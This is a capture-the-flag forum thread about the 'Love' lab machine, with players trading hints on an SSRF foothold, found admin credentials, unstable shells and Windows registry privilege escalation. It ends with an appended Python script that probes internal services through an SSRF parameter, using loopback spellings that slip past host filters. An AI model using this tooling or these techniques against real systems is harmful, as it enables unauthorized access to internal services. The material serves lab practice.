Official Love Discussion

Rooted! thx to some tips in this forum


Could someone DM me a tip for the foothold? I found the ‘beta’ page I can interact with, but I struggle to find a valid file to throw there… Much appreciated!

@anir08 said:

Rooted.

For anyone looking at the forums searching for hints, I’m gonna be blunt and say this: You know what you know and you don’t know what you don’t know! Stop with that TryHard thing!
My hints:

FootHold/User
Let your nmap be aggressive and read the output very carefully! Half of the steps to Foothold lie there! Got it? Nice!
Make the necessary changes. Cool!
Now head over to the “secret” area which was not available before and manually enumerate it very carefully! Like use your EYES instead of firing off gobuster and wfuzz.
Then read about this:
What is SSRF (Server-side request forgery)? Tutorial & Examples | Web Security Academy
Read it? Now you know what to do!

Take a step back and let the snake take the auto-pilot from there!!

Escalation/System
I’d be real honest here… if you don’t have a solid Windows priv-esc methodology, you won’t be able to do this. It’s more like a hit-error-success thingy. Without giving away much, enumerate registry keys and look for software policies… Google a lot and you’ll end up on a famous blog website which explains exactly what it is. From there it’s 2 minutes to SYSTEM.

I fell into the Rabbit Hole concerning the ***i and lost 2 hours until I looked at it again from the top side. Sometimes you need to take a breather!
Good Luck!
El-Psy-Kongroo!

(Also why the ■■■■ can’t I submit the flags ■■■■)

Edit: Flag submitted- had to revert it two times (sorry if I caused disturbances to others in that time)

Thanks! I was trying all the right things… but the link helped me with the right format

@Ob1lan said:

Could someone DM me a tip for the foothold? I found the ‘beta’ page I can interact with, but I struggle to find a valid file to throw there… Much appreciated!

Same here, I would really appreciate some help…

On the beta, I can read files and believe me, I tried hundreds, I did not find anything interesting. Could somebody tell me if this is the right way to go - look at the content of files? I went down the SSRF road as well, but no success.

I gladly went down every rabbit hole there was, even tried cracking hashes I found for two hours ^^

EDIT: Thanks @NoMad for the reassurance that simple SSRF is the way to go! Root part took like 5 minutes, luckily it’s one of the first things I check manually. :wink:

I found Vote Admin Creds… but I’m not able to login with them??

@quantumtheory said:

I found Vote Admin Creds… but I’m not able to login with them??

Make sure you copy/paste correctly… Some pesky characters can follow sometimes :wink:

@Ob1lan said:

@quantumtheory said:

I found Vote Admin Creds… but I’m not able to login with them??

Make sure you copy/paste correctly… Some pesky characters can follow sometimes :wink:

I get the same error whether I try pasting, typing manually, with/without the extra spaces, etc… Not sure how else to go about it really. Was thinking I just had the wrong creds, but I’ve seen elsewhere that the creds I found are indeed the correct ones. I dunno.

Fun box!

Could someone DM with assistance. I need to understand what I am missing. I have the workings of the foothold, just unsure what exactly I should be targeting. Thank you in advance.

Edit: I played around a little more and got my start.

Edit Edit: Rooted. Priv Escalation is Easy Peasy.

Got user, enjoyed that, however struggling on PrivEsc.

Shell doesn’t seem to be stable whatsoever. My mr shell doesn’t even spawn, even with encoding, and the only successful shell has been a standard non-mr, but even that dies after a few minutes… any nudges? Don’t need much, just a stable platform to start PrivEsc from.

Rooted

Can I DM someone? I’m still having issues… I have what I believe is what I need to proceed, but nothing is working…

Would someone give me a hand? I’m stuck at user, I’ve used dirb but I don’t see anything, just several shells already uploaded that I don’t know how to take advantage of.

@quantumtheory said:

I found Vote Admin Creds… but I’m not able to login with them??

Make sure you are logging in to the correct website.

There’s one that asks for the user ID and one that asks for the username. Make sure you are logging into the latter one.

Finally rooted after a couple of days banging my head against the wall trying to find user.
Privilege escalation on the box isn’t exactly a walk in the park if you’ve never done Windows boxes before imo, but nothing extremely fancy either.

Either way, fun box!

DM if you need any nudges

Finally I got user and root. I spent too many hours trying to get the initial steps through the enumeration using S**F. From there, it was easy to get a shell, and the privesc was done by following the steps you can google easily for windows enumeration.

Pepe

@quantumtheory said:

@Ob1lan said:

@quantumtheory said:

I found Vote Admin Creds… but I’m not able to login with them??

Make sure you copy/paste correctly… Some pesky characters can follow sometimes :wink:

I get the same error whether I try pasting, typing manually, with/without the extra spaces, etc… Not sure how else to go about it really. Was thinking I just had the wrong creds, but I’ve seen elsewhere that the creds I found are indeed the correct ones. I duno

@quantumtheory I have the same problem dude, I’m on the right page, right creds, I tried removing the !! part also, tried with hydra, tried curling, tried any virtual possible solution to this problem and still it gives me incorrect password, but I id l********:**00 like you probably in the “secret” page for file checking… and man it won’t budge, it’s driving me nuts man, it’s 1AM and I work at 6AM and I still don’t wanna go to sleep… ■■■■ my life :frowning:

After a lot of frustration (and hours of trying) I managed to get the root as well!!

The thing is that I actually happened to open a win priv esc website at the correct chapter, and after checking some registry keys I knew what to do. BUT… no matter what I did, it just didn’t work. Among others, I tried everyone’s favorite hacking console ;), which even said the target is vulnerable, but still wouldn’t give me a session. I tried via cmd and powershell, but the furthest I got was an error message stating “The Windows Ir Service could not be accessed. This can occur if the Windows Ir is not correctly installed.” I even started suspecting that someone is messing with this box, but a restart didn’t solve the problem.

After starting over from the very beginning I found out that there is actually another very different way to get into the system as user!! This second route is a bit longer, but the correct one. Repeating everything here works like a charm. I can root the box using all of the above methods, none of which worked when accessing the system differently.

So here is my question to you gurus: why doesn’t the e*****i command (the last command which gives the root) work on the same exact payload file planted in the system, when the system is accessed via winrm? I did some studying and learned that this method executes in session 0 whereas the correct route executes in session 1. I am kind of guessing this relates to the explanation, as everything else looks the same (I have two meterpreter consoles open side by side and can not find any other differences). Is someone able to explain this? Would appreciate much, thanks :slight_smile:

ps. the rabbit hole was too deep!!

User: Just read the output of the nmap line-by-line, you will find another way. Now if you found this new place, see what things you can do with the tool/service present there. Try to access those things which are forbidden for you in the first place. This will give you a set of creds; be careful where you are using these creds.

Root: This is the easy part. Try to “Elevate” yourself from user to admin. :wink:

DM me for the hints.
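Several posters above describe the same foothold pattern: the “beta” fetcher reads whatever URL you hand it, and the trick is to point it at the services your nmap scan showed on loopback (the ones “forbidden for you in the first place”) rather than guessing file names. The script below is an added example, not code from the thread or from the box author, of doing that systematically: it spells the loopback address several ways (to get past naive host filters), pairs each spelling with the ports from your scan, pushes every candidate through the SSRF parameter and flags responses that differ from a closed-port baseline. The endpoint URL, the parameter name and the port list are assumptions, and `fake_fetch` is a constructed stand-in for a real HTTP client so the example runs offline.

```python
"""Added example (not from the thread or the box author): systematic SSRF
probing of loopback services through a URL-fetching parameter.  Endpoint,
parameter name and port list are assumptions; fake_fetch is constructed."""
from __future__ import annotations

import ipaddress
from dataclasses import dataclass
from typing import Callable, Iterable
from urllib.parse import parse_qs, urlencode, urlparse

SSRF_ENDPOINT = "http://staging.example/beta.php"  # assumption: the "beta" fetcher
SSRF_PARAM = "file"                                 # assumption: its URL parameter
INTERNAL_PORTS = [80, 443, 3306, 5000, 5986]        # constructed; take yours from nmap


def loopback_variants(ip: str = "127.0.0.1") -> list[str]:
    """Equivalent spellings of one loopback address.  A filter that only
    denies the literal strings 127.0.0.1 / localhost misses the rest."""
    addr = ipaddress.IPv4Address(ip)
    return [
        ip,
        "localhost",
        str(int(addr)),          # decimal form: 2130706433
        "0x%08x" % int(addr),    # hex form: 0x7f000001
        "127.1",                 # short form that inet_aton accepts
        "[::1]",                 # IPv6 loopback
        f"[::ffff:{ip}]",        # IPv4-mapped IPv6
    ]


def candidate_urls(ports: Iterable[int], hosts: Iterable[str] | None = None) -> list[str]:
    """One URL per (host, port); HTTPS for the usual TLS ports, HTTP otherwise."""
    hosts = list(hosts) if hosts is not None else loopback_variants()
    tls_ports = {443, 5986, 8443}
    return [
        f"{'https' if port in tls_ports else 'http'}://{host}:{port}/"
        for host in hosts
        for port in ports
    ]


@dataclass
class Probe:
    target: str
    status: int
    length: int
    interesting: bool


def probe(fetch: Callable[[str], tuple[int, bytes]], targets: Iterable[str],
          baseline: str = "http://127.0.0.1:1/") -> list[Probe]:
    """Send every target through the SSRF parameter and flag responses that
    differ from a closed-port baseline in status or noticeably in size.
    `fetch(url) -> (status, body)` is whatever HTTP client you use."""
    def via_ssrf(target: str) -> tuple[int, bytes]:
        return fetch(SSRF_ENDPOINT + "?" + urlencode({SSRF_PARAM: target}))

    base_status, base_body = via_ssrf(baseline)
    out = []
    for target in targets:
        status, body = via_ssrf(target)
        differs = status != base_status or abs(len(body) - len(base_body)) > 32
        out.append(Probe(target, status, len(body), differs))
    return out


def fake_fetch(url: str) -> tuple[int, bytes]:
    """Constructed stand-in for a real client (offline demo only): the SSRF
    endpoint proxies to loopback, where a single service listens on 5000."""
    target = parse_qs(urlparse(url).query).get(SSRF_PARAM, [""])[0]
    if urlparse(target).port == 5000:
        return 200, b"<html><title>Internal admin</title>" + b"<p>config</p>" * 20
    return 200, b"Unable to fetch the requested resource."


def run_example() -> list[Probe]:
    """Probe the constructed target and return only the hits."""
    return [p for p in probe(fake_fetch, candidate_urls(INTERNAL_PORTS)) if p.interesting]


if __name__ == "__main__":
    for hit in run_example():
        print(f"{hit.status} {hit.length:6d}  {hit.target}")
```

Against a real target, swap `fake_fetch` for a function wrapping your HTTP client and feed `INTERNAL_PORTS` from the scan output; a hit that comes back with a login page or configuration text is the internal resource the hints are pointing at, and the baseline comparison keeps you from reading hundreds of identical “unable to fetch” responses by hand.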